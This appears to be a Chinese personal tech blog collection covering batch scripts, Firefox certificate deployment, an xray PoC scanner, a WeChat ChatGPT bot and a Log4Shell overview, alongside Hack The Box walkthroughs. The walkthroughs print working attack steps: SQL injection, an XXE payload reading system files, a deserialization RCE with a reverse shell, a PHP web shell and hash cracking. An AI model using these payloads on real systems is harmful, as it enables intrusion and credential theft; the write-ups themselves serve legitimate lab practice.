+愿2023年顺利。
+待更。
+引用图片方法1
+
设置封面图片的几种方式:
+Firefox安装证书的几种方式。
+1 | @echo off |
在这个示例脚本中,首先使用set命令给变量Value1赋初值为"ww"。然后,脚本使用reg query命令检查注册表中是否存在指定的注册表目录,如果存在,则使用for /f命令和reg query命令的输出来解析注册表值的名称和数据,并将其存储在变量Value1中。最后,脚本输出变量Value1的值,以及一个附加的字符串1。
请注意,在使用echo命令输出变量Value1的值之前,需要在变量名前加上%字符。否则,输出的将是变量名本身,而不是其存储的值。另外,变量Value1的值在if语句中被设置,因此需要在该语句块中使用!字符来代替%字符,以启用延迟变量扩展。这样,才能在语句块中正确地引用变量Value1的值。
我刚开始用%%输出变量值,发现跟预期不一致,万能的GPT帮我纠正了这个错误。
+关于引用变量:
+在 Windows 中,批处理脚本中使用变量时,有两种方式来引用变量的值:%var% 和 !var!。这两种方式的主要区别在于变量的扩展方式和生命周期。
%var% 表示立即扩展变量,也称为百分号变量。在批处理脚本中,使用 %var% 可以将变量扩展为其当前值。变量在整个批处理脚本的生命周期内都是有效的,但是在某些情况下,它们可能不会像预期那样扩展。例如,如果要在一个代码块中使用变量,而该变量在该代码块之前已被更改,则百分号变量可能会扩展为旧值,而不是新值。
!var! 表示延迟扩展变量,也称为感叹号变量。在批处理脚本中,使用 !var! 可以将变量扩展为其当前值,但是它是在运行时进行扩展的,而不是在解析时进行扩展的。因此,变量的生命周期仅限于它们在脚本中使用的代码块。如果需要在代码块中使用变量,并且该变量在代码块之前已被更改,则可以使用感叹号变量来确保变量扩展为其当前值。
在批处理脚本中,使用 setlocal enabledelayedexpansion 命令可以启用感叹号变量。启用延迟扩展后,可以使用 !var! 来引用变量的值。
因此,%% 表示百分号变量,!! 表示感叹号变量。在批处理脚本中,使用 %% 来引用百分号变量的值,使用 !! 来引用感叹号变量的值。
脚本执行后马上闪退可能是由于脚本中的某个命令出错导致的。您可以尝试添加 pause 命令到脚本的末尾,这样脚本执行完毕后会暂停,以便您查看执行结果和错误信息。
如果您希望在脚本发生错误时能够看到错误信息,可以将 @echo off 命令注释掉,这样脚本在执行时会输出命令的执行结果和错误信息,以便您查看。
另外,您还可以尝试在命令行中执行脚本,而不是双击脚本文件来执行,这样如果脚本发生错误,错误信息将会一直显示在命令行中,直到您手动关闭命令行窗口。
+最后,如果您仍然无法解决问题,可以尝试逐步注释掉脚本中的命令,直到找到引起问题的命令为止。
+firefox使用自己的证书库,其他浏览器如Chrome,使用操作系统的证书库。
+https://wiki.mozilla.org/CA/AddRootToFirefox (官方说法,最全。)
+https://stackoverflow.com/questions/1435000/programmatically-install-certificate-into-mozilla
+使用nss,下载nss包(官方已删除已仓库连接,没有编译好的版本,需重新编译)好像还需要NSPR,使用certutil.exe(和windows自带的certutil是两种不同的东西。)
参考地址:https://stackoverflow.com/questions/1435000/programmatically-install-certificate-into-mozilla
https://stackoverflow.com/questions/50159193/how-to-add-certificate-programmatically-into-firefox-version-59-cannot-find-cer
文件下载路径:
https://ftp.mozilla.org/pub/security/nss/releases/NSS_3_13_5_RTM/src/
https://ftp.mozilla.org/pub/nspr/releases/
构建方法:https://brpoblog.wordpress.com/2015/10/02/add-certificates-to-firefox-installation-with-certutil/
+报错,提示缺少MSVCR71.DLL。下载此dll文件,放到bin文件夹。
https://cn.dll-files.com/download/837b1e310f2aa8b20f07a9b1ce90ac4f/msvcr71.dll.html?c=d3JyZEIva1QwMm1IbFpwVGhQK1kwQT09
1 | 显示证书: |
certutil.exe使用方法:
+1 | C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H |
使用https://github.com/christian-korneck/firefox_add-certs (The release download includes a build of the NSS certutil.exe.)
+适用于Firefox49版本及以上
+https://support.mozilla.org/en-US/kb/setting-certificate-authorities-firefox
+ +替换firefox configuration
+ +https://docs.trendmicro.com/all/ent/ddwi/2.5/en-us/ddwi_2.5_olh/Deploy-the-Default-C_001.html
+创建ddwi.cfg,内容如下。复制到文件夹:
+C:\Program Files\Mozilla Firefox\ddwi.cfg
+C:\Program Files (x86)\Mozilla Firefox\ddwi.cfg
+1 | // |
创建local-settings.js,内容如下。复制到文件夹:
+C:\Program Files\Mozilla Firefox\defaults\pref\local-settings.js
+C:\Program Files (x86)\Mozilla Firefox\defaults\pref\local-settings.js
+1 | pref("general.config.obscure_value", 0); |
注意,通过上述启用此选项后,会出现过几分钟又变成false的现象,过一会儿又自动变成True,没查到为什么会有这种现象,暂未解决。所以建议手动更改此配置选项。或使用下面的另一种方法:修改user.js配置文件。
+参考:http://www.360doc.com/content/19/1031/22/73478_870350348.shtml
+https://kb.mozillazine.org/User.js_file
+
FireFox搜索框输入about:profiles,找到配置文件路径,一般情况下有两个配置文件目录。在如下路径:
+1 | %APPDATA%\Mozilla\Firefox\Profiles |
创建user.js文件,复制到此配置文件目录下。
+1 | user_pref("security.enterprise_roots.enabled", true); |
重启浏览器,发现此选项已经变成True
+
准备好证书文件,各种配置文件,以及用NSS库构建的certutil.exe文件和安装脚本。全部放到C盘根目录下的firefoxinstallcert文件夹。
+建议使用脚本2
+通过cfg配置文件lockPref启用security.enterprise_roots.enabled。
+1 | @echo off |
通过user.js启用security.enterprise_roots.enabled。
+1 | @echo off |
http://www.certificate.fyicenter.com/389_Download_Mozilla_certutil_Tool_for_Windows_7.html
+https://dev-tech-crypto.mozilla.narkive.com/QtN6vuxG/availability-of-certutil-on-windows
+https://brpoblog.wordpress.com/2015/10/02/add-certificates-to-firefox-installation-with-certutil/
+社区版下载和使用
+注意下载新版的,旧版可能无法加载自定义POC
+https://github.com/chaitin/xray/releases
+查看help
+xray_windows_amd64.exe webscan --help
1 | Version: 1.9.11/eb0c331d/COMMUNITY |
查看webscan使用
+xray_windows_amd64.exe webscan --help
1 | Version: 1.9.11/eb0c331d/COMMUNITY |
参考:https://blog.csdn.net/holyxp/article/details/133066481
+https://www.secrss.com/articles/58981
+burp发送请求包:
+1 | GET /api/v1/terminal/sessions/?limit=2 HTTP/1.1 |
查看response
+1 | HTTP/1.1 200 OK |
使用方法,运行单个自定义POC,命令如下:
+1 | xray_windows_amd64.exe webscan --plugins phantasm --poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml --url http://example.com/ --html-output CVE-2023-42442.html --json-output CVE-2023-42442.json |
这是一个JumpServer未授权访问漏洞(CVE-2023-42442)。POC如下:
+原理很简单,这段代码描述了对服务器响应的检查条件。它要求响应的状态码为200,并且响应体中包含特定的字符串:”count”、”next”、”previous”和”results”。这些条件共同判断了漏洞利用的成功条件。
+1 | name: poc-yaml-jumpserver-session-replay-unauth |
执行过程:
+1 | ____ ___.________. ____. _____.___. |
最后,打开html报告查看漏洞详情即可。
+如何编写高质量POC:https://docs.xray.cool/#/guide/hiq/summary
+规则实验室:https://poc.xray.cool/
+可以通过该工具便捷的生成POC,同时可以使用该工具对POC进行格式检查与查重
+具体可以查看开发者文档:https://docs.xray.cool/#/guide/README
+社区贡献的POC:https://github.com/chaitin/xray/tree/master/pocs
+POC示例:
+1 | name: poc-yaml-yonyou-chanjet-file-updoad |
1 | name: poc-yaml-apache-druid-kafka-rce |
参考:https://github.com/zhayujie/chatgpt-on-wechat
+1 | git clone https://github.com/zhayujie/chatgpt-on-wechat |
修改配置文件:
+1 | cp config-template.json config.json |
1 | { |
项目默认使用OpenAI接口,需前往 OpenAI注册页面 创建账号,创建完账号则前往 API管理页面 创建一个 API Key 并保存下来,后面需要在项目中配置这个key。接口需要海外网络访问及绑定信用卡支付。
+或者使用第三方API。
+ +或者:https://chat.link-ai.tech (推荐,便宜)
+注意,配置第三方linkai_api之后,无需再配置open_ai_api_key.
+配置文件如下:
+1 | { |
直接启动:python3 app.py
后台运行:nohup python3 app.py & tail -f nohup.out
日志输出到nohup.out
搜索进程并kill
+1 | ps -ef | grep app.py | grep -v grep |
https://github.com/goldfishh/chatgpt-on-wechat/blob/master/plugins/tool/README.md
+Tool工具: 与操作系统和互联网交互,支持最新信息搜索、数学计算、天气和资讯查询、网页总结,基于 chatgpt-tool-hub 实现
+相关API申请方法如下:
+https://github.com/goldfishh/chatgpt-tool-hub/blob/master/docs/apply_optional_tool.md
+进入目录配置:plugins/tool
+cp config.json.template config.json
+配置需要开启的插件,有些需要API
+1 | 1 { |
#help tool: 查看tool帮助信息,可查看已加载工具列表
$tool 命令: 根据给出的{命令}使用一些可用工具尽力为你得到结果。
$tool reset: 重置工具。
使用一段时间后,提供插件未启用,排查发现是配置文件自动改为了false.
+重新修改为true即可。
+chatgpt-on-wechat/plugins/plugins.json
+1 | 19 "tool": { |
https://github.com/zhayujie/chatgpt-on-wechat/tree/master/plugins/linkai
+https://link-ai.tech/platform/link-app/wechat
+进入控制台:
+https://chat.link-ai.tech/console/factory
+新用户有免费的600积分。
+我充值了1w积分,生成一张图片需要150积分。
+将 plugins/linkai 目录下的 config.json.template 配置模板复制为最终生效的 config.json。
配置项中 group_app_map 部分是用于映射群聊与LinkAI平台上的应用, midjourney 部分是 mj 画图的配置,summary 部分是文档总结及对话功能的配置。三部分的配置相互独立,可按需开启。
1 | { |
添加下面几行。
+1 | "use_linkai": true, |
刚开始没有写linkai_api_base,会报错。加入这个参数之后可以正常使用。
+开启之后,艾特机器人,并输入提示词”画”,就会根据要求输出图片。
+该功能依赖 LinkAI的知识库及对话功能,需要在项目根目录的config.json中设置 linkai_api_key, 同时根据上述插件配置说明,在插件config.json添加 summary 部分的配置,设置 enabled 为 true。
如果不想创建 plugins/linkai/config.json 配置,可以直接通过 $linkai sum open 指令开启该功能。
功能开启后,向机器人发送 文件 或 分享链接卡片 即可生成摘要,进一步可以与文件或链接的内容进行多轮对话。
+txt, docx, pdf, md, csv格式,文件大小由 max_file_size 限制,最大不超过15M,文件字数最多可支持百万字的文件。但不建议上传字数过多的文件,一是token消耗过大,二是摘要很难覆盖到全部内容,只能通过多轮对话来了解细节。暂时报错,未解决。
+提示缺少ffmpeg ,安装后发现后台运行会报错,且未解决问题。
+于是直接关闭语音识别和回复语音的功能。
+1 | 23 "speech_recognition": false, |
花了一整天时间,成功接入微信。效果还是很不错,可以当作群助手,配置tool插件后提供了更强大了功能。
+比如:
+1 | 已加载工具列表: |
需要服务器资源,GPT API资源,以及linkai资源以接入Midjourney.使用人数多的话,也是一笔不小的支出。
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB] |
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain in /etc/hosts
1 | vim /etc/host |
使用浏览器插件Wappalyzer检查wordpress版本,php版本。
+1 | WordPress 5.6.2 |
进入到网站event目录下,检查源码发现bookingpress plugin版本是1.0.10,存在漏洞CVE-2022-0739
在网页源码中找到字段_wpnonce对应的值1d0870781e,使用https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357/ POC进行探测。
1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB] |
返回结果如下:
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB] |
此结果说明确实存在Sql注入漏洞。
+使用sqlmap
+1 | sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data |
扫描结果:
+1 | [15:30:38] [INFO] the back-end DBMS is MySQL |
继续:
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB] |
表wp_users中存放着用户数据信息。对此表进行爆破
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB] |
得到了用户密码哈希。
+1 | admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. |
使用exp: https://github.com/destr4ct/CVE-2022-0739/blob/main/booking-press-expl.py
+运行,很快就出结果了:
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] |
msf一把梭:
+1 | msf6 > search bookingpress |
将哈希值保存到文件
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] |
使用kali自带工具John The Ripper 对哈希进行爆破
+爆破结果:
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] |
用户名密码:
+1 | manager:partylikearockstar |
用此密码登陆到默认目录:/wp-admin
根据网上查到到的信息,此版本的wordpress存在XXE漏洞CVE-2021-29447
+https://wpscan.com/wordpress/562/
+https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5/
+https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
+https://tryhackme.com/r/room/wordpresscve202129447
+We need two files, payload.wav and evil.dtd .
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] |
Note: Make sure to input the IP of your tun0 interface in the above payload.
+创建文件evil.dtd
+1 | <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> |
利用python开启http服务器。
+1 | python3 -m http.server 8080 |
打开网页,向Wordpress Media Library中上传刚才创建的.wav文件
+上传文件后,我们会在 Web 服务器上收到以下包含 base64 编码数据的请求。
+
1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] |
base64解码结果:
+1 | root:x:0:0:root:/root:/bin/bash |
根据此结果判断,有个叫jnelson的普通用户存在。
+修改evil.dtd文件内容,用于获取wp_config.php配置文件信息
1 | <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php"> |
重复上述上传过程,并解码返回的信息,得到如下内容:
+1 |
|
通过此信息,获得了FTP服务器的用户名和密码
+1 | username : metapress.htb |
连接到FTP服务器:
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] |
在 ftp 服务器中,找到了邮件服务器的源代码和一个向所有用户发送电子邮件的脚本send_mail.php,其中包含 jnelson 用户的凭据
+1 | ftp> ls |
在ftp中使用get命令将此文件下载到本地查看:
+1 |
|
结合之前获得的/etc/passwd文件,有个叫jnelson的用户存在,在此处获得了密码。
+1 | $mail->Username = "jnelson@metapress.htb"; |
利用ssh登陆:
+1 | ssh jnelson@$IP |
获取到user_flag:
+1 | 0a432515f485c621b015cefe55d1e72e |
查看到其中有一个隐藏文件夹passpie
1 | jnelson@meta2:~$ ls -la |
上网查到,这是一个python写的密码管理器。
+根据官网文档,可以使用命令导出密码。
+1 | passpie export password.db |
The .keys file contains gpg keys which contain the passpie passphrase.
+1 | jnelson@meta2://home/jnelson/.passpie$ ls -la |
1 | jnelson@meta2://home/jnelson/.passpie$ cat .keys |
保存私钥到文件key,并转换为john hash格式:
1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] |
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash
运行john时报错:
1 | Crash recovery file is locked: /root/.john/john.rec |
解决方法:
+1 | rm /root/.john/john.rec |
开始爆破:
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] |
爆破出密码blink182
利用爆破出的密码,导出passpie密码库:
+1 | jnelson@meta2:~$ passpie export passwd |
使用root密码p7qfAZt4_A1xo_0x 登陆获得root_flag.
1 | jnelson@meta2:~$ su root |
对于已经爆破成功的文件:第二次只用show参数即可,不需要重复多次爆破。
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] |
https://github.com/evyatar9/Writeups/tree/master/HackTheBox/MetaTwo
+https://medium.com/@KonradDaWo/hackthebox-metatwo-writeup-59135896c890
+ + +Log4j 漏洞又称“Log4Shell”,是 2021 年 11 月在 Apache Log4j 日志库中发现的一个严重漏洞。Apache log4j 是一个开源的基于 Java 的日志框架,它允许开发人员将 Log4J 库插入到自己的应用程序中,而无需编写专用的日志记录器。这种便利性是 Log4J 被广泛使用的原因。它被广泛用于大量商业软件中,例如 Steam 和 Apple iCloud。它还被广泛用于其他网站框架基础,例如 Elasticsearch、Kafka 等。
Log4Shell 是 Apache Log4J 2.14.1 及更早版本中的远程代码执行 (RCE) 漏洞,其常见漏洞披露标识符为 CVE-2021-44228。Log4j 漏洞是互联网历史上最具破坏性的漏洞之一。
根据IBM官方威胁情报记录,Log4j漏洞导致2021年12月全球网络攻击数量激增。
研究人员认为,Log4Shell是一个“灾难性”的0 Day漏洞,因为Log4J是全球部署最广泛的开源程序之一,而且该漏洞不需要特殊权限或身份验证,很容易被黑客利用。
美国网络安全和基础设施安全局(CISA)局长Jen Easterly在接受媒体采访时表示,这是她职业生涯中见过的最严重的事件。她还表示,CISA正在积极与公共和私营部门的合作伙伴合作,解决影响包含Log4j软件库的产品的关键漏洞。
受影响版本:
+1 | Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. |
+ graph LR
+ A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?}
+ C -->|Yes| D[Execute<br>JNDI lookup]
+ C -->|No| E[Normal log]
+ D --> F[Connect to<br>attacker's server]
+ F --> G[Download &<br>execute<br>malicious codes]
+ G --> H[Attacker gains<br>server control]
+ + timeline + title Log4j Vulnerability Incident Timeline + November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache + December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0) + December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware + December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert + December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack + December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability +
Log4j漏洞,也称为**Log4Shell (CVE-2021-44228)**,是一个严重的远程代码执行(RCE)漏洞,影响了 Apache Log4j 2 版本。这一漏洞允许攻击者通过向日志记录输入恶意的JNDI(Java Naming and Directory Interface)查找字符串,触发服务器下载和执行恶意代码。
+为了防止该漏洞的利用,以下是一些缓解措施和修复步骤。
+这是最有效的解决方案。Apache 官方已经发布了修复版本,建议尽快升级到2.15以上版本
+如果暂时无法升级 Log4j,可以通过禁用 JNDI 功能来缓解漏洞。
+JNDI 查找。在 JVM 启动时添加以下系统属性:
+1 | -Dlog4j2.formatMsgNoLookups=true |
这将禁用日志事件中对 ${jndi:} 查找的解析。
++注意:该方法适用于 Log4j 2.10 至 2.14.1 的版本。对于 Log4j 2.15.0 及以上版本,这个选项默认被启用,但最好还是尽快升级到最新版本。
+
对于无法及时升级的情况,还可以通过移除 JndiLookup 类来减轻漏洞影响。
找到 Log4j jar 文件。
+使用以下命令移除 JndiLookup 类:
1 | zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class |
这会从 log4j-core jar 文件中删除该类,从而禁用 JNDI 查找。
虽然这并不能完全修复漏洞,但可以通过限制外部网络访问和加强防火墙规则来减少被攻击的风险。
+${jndi:、${ctx: 等可能利用 Log4j 的字符串请求。-Dlog4j2.formatMsgNoLookups=true 禁用 JNDI 查找功能,或者移除 JndiLookup 类。https://github.com/fullhunt/log4j-scan
+https://github.com/cisagov/log4j-scanner
+https://github.com/proferosec/log4jScanner
+需要指定一个DNS callback服务器。比如dnslog.cn
+通过使用了这个库的应用来复现这个漏洞,比如Apache Solr。
+通过vulhub提供的镜像,启动一个Apache Solr 8.11.0,其依赖了Log4j 2.14.1
+1 | cd vulhub-master/log4j/CVE-2021-44228 |
服务启动后,访问http://localhost:8983即可查看到Apache Solr的后台页面。
Poc:
+1 | http://localhost:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.bf5c23cc.log.dnslog.biz.} |
在https://dnslog.org/ 中看到DNS解析纪录中,返回了java版本。漏洞复现成功。
+
也可使用Marshalsec进行LDAP,RMI漏洞利用。
+https://github.com/pentesterland/Log4Shell
+https://www.51cto.com/article/714872.html
+https://www.youtube.com/watch?v=XC3Oqn_yADk
+https://www.youtube.com/watch?v=Opqgwn8TdlM
+https://www.youtube.com/watch?v=7qoPDq41xhQ
+vulhub提供的都是amd的docker镜像,在arm的linux虚拟机里跑不起来。用https://github.com/vulhub/vulhub/issues/478 用的解决方法也未成功。
+于是在Mac上启动docker, Use Rosetta for x86_64/amd64 emulation on Apple Silicon.
+本来准备用JNDInjector这个工具,但是运行报错,在官网下载JavaFX的aarch64架构的JDK,下载后发现java版本不匹配。升级java:
访问Azul Zulu的下载页面: https://www.azul.com/downloads/?package=jdk#zulu
+选择Java 17 (LTS)版本,下载dmg并安装。
+验证是否安装成功
+1 | /usr/libexec/java_home -V |
添加环境变量
+1 | echo 'export JAVA_HOME=$(/usr/libexec/java_home -v 17)' >> ~/.zshrc |
查看版本
+1 | java --version |
1 | java -verbose:class --module-path ./javafx-sdk-21.0.4/lib --add-modules javafx.controls,javafx.fxml -jar JNDInjector.jar |
还是跑不起来,暂时作罢。
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] |
1 | echo "10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts |
目录扫描:
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] |
根据扫描结果进入https://bizness.htb/content/ 页面
+自动跳转到https://bizness.htb/content/control/main 登陆界面
+查看右下角发现ERP系统版本:
+1 | Copyright (c) 2001-2024 The Apache Software Foundation. Powered by Apache OFBiz. Release 18.12 |
查询到此版本的Apache OFBiz有RCE漏洞CVE-2023-49070
+下载工具ysoserial
+1 | wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar |
创建exploit.py (此处会利用到ysoserial-all.jar)
+参考:https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC/blob/main/exploit.py
+运行报错,提示需要安装java-11-openjdk环境
+安装并切换java
+1 | sudo apt install openjdk-11-jdk |
1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] |
开启tcpdump
+1 | sudo tcpdump -i 2 icmp |
运行POC
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] |
查看抓到的数据包:
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop] |
说明RCE成功,现在进行反向shell
+首先开启nc监听,再运行exp
+1 | nc -nlvp 4444 |
1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] |
在用户目录下找到flag: /home/ofbiz/user.txt
找到安全配置文件/opt/ofbiz/framework/security/config/security.properties
查看用的哈希算法是默认的SHA-1 ,这是个好消息,因为SHA-1不安全,有可能破解。
1 | ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash |
这就引出了下一个问题,即密码和其他信息在 Apache OFBiz 中的存储位置。经查询,默认情况下,OFBiz 使用名为 Apache Derby 的嵌入式 Java 数据库。
+经查询,数据库文件存储在/opt/ofbiz/runtime/data/derby
1 | ofbiz@bizness:/opt/ofbiz/runtime/data/derby$ ls -la |
使用derby-tools的ij命令连接数据库。命令示例:
+1 | CONNECT 'jdbc:derby:./ofbiz'; |
从目标机器下载ofbiz文件到本地:
+在kali开启监听。
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] |
在目标机器上:
+1 | cd /opt/ofbiz/runtime/data/derby |
为了连接到此数据库,需要先下载工具。
+1 | apt install derby-tools |
连接并查看表:
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] |
找到关于用户信息的表:
+1 | OFBIZ |USER_LOGIN | |
1 | SELECT * FROM OFBIZ.USER_LOGIN; |
1 | SELECT USER_LOGIN_ID,CURRENT_PASSWORD FROM OFBIZ.USER_LOGIN; |
结果如下:
+1 | ij> SELECT USER_LOGIN_ID, CURRENT_PASSWORD FROM OFBIZ.USER_LOGIN; |
此处密码存储格式很奇怪,不能用传统的john或者Hashcat直接破解。
+机器上存在源码,查看哈希算法源码。
+1 | /opt/ofbiz/framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java |
源码如下:
+1 | cat HashCrypt.java |
根据源码的编码方式,进行反向解码:
+1 | $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I |
Therefore, we know that the hashType is SHA , the salt is a single letter d , and the rest(uP0_QaVBpDWFeo8-dRzDqRwXQ2I ) are the hashed bytes.
So, we now know that the characters are Base64-encoded, but without padding, and with + and/ characters replaced by - and _ , respectively.
解码得到hex:
+1 | import base64 |
1 | b8fd3f41a541a435857a8f3e751cc3a91c174362 |
注意加盐d,其中参数-m 120:指定哈希类型为 SHA-1 加盐
hash.txt
1 | b8fd3f41a541a435857a8f3e751cc3a91c174362:d |
运行hashcat
1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] |
爆破成功:b8fd3f41a541a435857a8f3e751cc3a91c174362:d:monkeybizness
获得破解后的密码:monkeybizness
su root
输入此密码获得root.txt
结束!
+下载文件时提示磁盘已满。在VM中扩容20G。进入kali, 打开工具。
+先关闭linux-swap,右键swap-off.
+将unallocated扩充到linux-swap上,再将linux-swap扩容到/dev/即可。
+
运行hashcat,提示* Device #1: Not enough allocatable device memory for this attack.
修改kali-VM的内存为4G,再运行hashcat即可。
对于已经爆破成功的文件:第二次只用show参数即可,不需要重复多次爆破。
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] |
1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] |
目录爆破
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] |
或者使用gobuster
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] |
或使用ffuf, 只显示成功的请求,并将扫描的输出结果同时显示在终端并保存到 scan_results.txt 文件中。
+1 | ffuf -u http://help.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -mc 200,301,302 | tee scan_results.txt |
根据爆破的目录,找到一个上传点:
+1 | http://help.htb/support/ |
上传phpshell提示文件类型不允许,但其实文件已经上传成功。
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] |
1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] |
优化修改后的Exp:
+1 | import hashlib |
上传文件phpshell.php
+1 | system($_GET['cmd']); |
上传后运行exp脚本,结果如下:
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] |
浏览器输入:
+1 | http://help.htb/support/uploads/tickets/13985c5cd0fa35388f56480d778564b5.php?cmd=id |
结果:
+1 | uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare) |
RCE利用成功。
+下载一个功能更强大的php-reverse-shell
1 | wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php |
修改php脚本中的IP为tun0的IP地址
1 | $ip = '10.10.14.9'; |
本地开启nc监听:
+1 | nc -lnvp 1234 |
上传php-reverse-shell,并使用exp脚本:
拿到user_flag:
+1 | $ cat /home/help/user.txt |
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbirtray file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
+这个 shell 可能是非交互式的,无法使用完整的终端功能(例如不能使用箭头键或者 tab 自动补全)。为了稳定它,可以使用以下命令使 shell 更加交互式:
+在目标机器的 shell 中,执行以下命令来获取伪终端:
+1 | python -c 'import pty; pty.spawn("/bin/bash")' |
如果目标机器上有 Python 3,使用:
+1 | python3 -c 'import pty; pty.spawn("/bin/bash")' |
一般情况下到这里就可以了,不用继续。
+在攻击者端(Netcat session),按下 Ctrl + Z 将会话挂起。
+注意,需要先将kali的zsh切换为bash!,如果使用zsh,可以将下面的命令链接起来:
+1 | stty raw -echo;fg |
设置终端模式:
+1 | stty raw -echo |
然后按 Enter 键,获得一个更稳定的交互 shell。
+最后,在目标机器上执行以下命令,设置终端环境:
+1 | export TERM=xterm |
现在拥有了目标机器的 Shell,接下来可以进行以下操作:
+枚举系统信息:
+1 | uname -a |
枚举权限:
+提权:
+
使用LinEnum.sh提权检查脚本(攻击机使用httpserver,目标机wget下载)
+1 | wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh |
version 0.982
+OPTIONS:
+注意,如果需要要目标机下载log文件到本地进行分析,可以在目标机使用:
+1 | python -m SimpleHTTPServer 8080 |
或使用uname -a 查看系统版本
+1 | help@help:/$ uname -a |
查到exp
+1 | ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] |
在kali启动http.server
+1 | python -m http.server |
在靶机wget下载文件并编译:
+1 | help@help:/tmp$ wget http://10.10.14.9:8000/44298.c |
运行,提权成功:
+1 | help@help:/tmp$ ./44298 |
在现代开发环境中,高效的终端管理工具对于提升工作效率至关重要。tmux正是这样一个强大的工具,它允许用户在单一终端窗口中创建、管理和切换多个会话(Sessions)、窗口(Windows)和窗格(Panes)。通过 tmux,可以轻松地并行处理多个任务,而无需频繁切换终端窗口或标签。这不仅优化了工作流程,还使得终端操作更加灵活和便捷。
以下是 会话(Sessions)、窗口(Windows) 和 窗格(Panes) 之间的关系:
+
在 tmux 中,所有快捷键操作通常以前缀键开始。默认的前缀键是 Ctrl + B。需要先按下 Ctrl + B,然后再按下指定的键来执行相应的操作。
1 | tmux new -s 会话名 |
1 | tmux new -s dev |
dev 的新会话。1 | tmux kill-session -t 会话名 |
1 | tmux kill-session -t dev |
dev 的会话。1 | tmux attach -t 会话名 |
1 | tmux a -t 会话名 |
1 | tmux attach -t dev |
dev 的已存在会话。1 | tmux ls |
tmux 会话。快捷键:Ctrl + B 然后按 C
